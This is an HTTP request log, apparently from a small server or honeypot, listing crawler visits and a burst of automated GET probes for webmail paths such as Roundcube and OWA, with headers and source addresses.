[2026-02-24 12:53:37] === HTTP Request ===
[2026-02-24 12:53:37] Main page accessed - IP: 4.180.183.243:65281
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Opera/4.02 (Windows 98; U) [en]
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65281
Path: /
URL: /
Method: GET
[2026-02-24 12:53:37] === HTTP Request ===
[2026-02-24 12:30:26] Main page accessed - IP: 207.90.244.21:42038
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.21:42038
Path: /
URL: /
Method: GET
[2026-02-24 12:30:26] === HTTP Request ===
[2026-02-24 12:18:39] Main page accessed - IP: 35.187.31.145:33116
===================
User-Agent: python-requests/2.32.5
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 35.187.31.145:33116
Path: /
URL: /
Method: GET
[2026-02-24 12:18:39] === HTTP Request ===
[2026-02-24 10:33:03] Main page accessed - IP: 176.65.149.45:42860
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:42860
Path: /
URL: /
Method: GET
[2026-02-24 10:33:03] === HTTP Request ===
[2026-02-24 10:29:40] Main page accessed - IP: 172.30.0.12:45124
===================
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
X-Forwarded-For: 74.7.242.5
From: gptbot(at)openai.com
X-Openai-Host-Hash: 867116608
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45124
Path: /
URL: /
Method: GET
[2026-02-24 10:29:40] === HTTP Request ===
===================
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.244.26
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
Via: 2.0 Caddy
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45124
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-02-24 10:29:37] === HTTP Request ===
===================
Accept-Language: zh-CN,zh;q=0.8
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 114.55.234.26:43898
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 09:56:53] === HTTP Request ===
[2026-02-24 09:56:52] Main page accessed - IP: 114.55.234.26:43890
===================
Accept-Language: zh-CN,zh;q=0.8
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 114.55.234.26:43890
Path: /
URL: /
Method: GET
[2026-02-24 09:56:52] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65180
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:52:22] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65158
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:52:21] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65168
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:52:21] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65176
Path: /image/lgbg.jpg
URL: /image/lgbg.jpg
Method: GET
[2026-02-24 08:52:20] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65156
Path: /nobody/favicon.ico
URL: /nobody/favicon.ico
Method: GET
[2026-02-24 08:52:20] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65155
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:52:19] === HTTP Request ===
===================
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65163
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:52:19] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Connection: close
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65153
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:52:18] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65167
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:52:18] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65166
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:52:18] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65159
Path: /skin/default_1/images/logo.png
URL: /skin/default_1/images/logo.png
Method: GET
[2026-02-24 08:52:17] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65164
Path: /login.rsp
URL: /login.rsp
Method: GET
[2026-02-24 08:52:16] === HTTP Request ===
[2026-02-24 08:52:16] Main page accessed - IP: 4.180.183.243:65161
===================
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65161
Path: /
URL: /
Method: GET
[2026-02-24 08:52:16] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33645
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 Thunderbird/140.0
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33637
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.6.16
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33641
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:140.0) Gecko/20100101 Firefox/140.0
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33639
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33601
Path: /cube/
URL: /cube/
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.6.16
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33607
Path: /owa
URL: /owa
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 Thunderbird/140.0
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33611
Path: /js/zimbraMail/share/model/ZmSettings.js
URL: /js/zimbraMail/share/model/ZmSettings.js
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:140.0) Gecko/20100101 Firefox/140.0
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33603
Path: /owa/
URL: /owa/
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33593
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.22
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33591
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33589
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33585
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33579
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33571
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8.1 Mobile/15E148 Safari/604.1
Connection: close
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33559
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33561
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.3
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33555
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33551
Path: /cube
URL: /cube
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.22
Connection: close
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33541
Path: /webmail/rc/
URL: /webmail/rc/
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33537
Path: /webmail/rc
URL: /webmail/rc
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33529
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33521
Path: /mail/roundcube/
URL: /mail/roundcube/
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33525
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33527
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33523
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33517
Path: /mail/roundcube
URL: /mail/roundcube
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33505
Path: /webmail/roundcube/
URL: /webmail/roundcube/
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/15.4 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33493
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33499
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8.1 Mobile/15E148 Safari/604.1
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33495
Path: /webmail/roundcube
URL: /webmail/roundcube
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33489
Path: /rc
URL: /rc
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33485
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33481
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.3
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33477
Path: /rc/
URL: /rc/
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33473
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Mobile/15E148 Safari/604.1
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33471
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/14.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33461
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/603.1.10 (KHTML, like Gecko) Version/10.1 Safari/603.1.10
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33463
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:140.0.) Gecko/20100101 Firefox/140.0.
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33451
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33455
Path: /roundcubemail
URL: /roundcubemail
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33429
Path: /email/
URL: /email/
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33449
Path: /roundcubemail/
URL: /roundcubemail/
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33445
Path: /email
URL: /email
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33439
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33423
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 08:01:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 5.101.157.136:33421
Path: /rcmail
URL: /rcmail
Method: GET
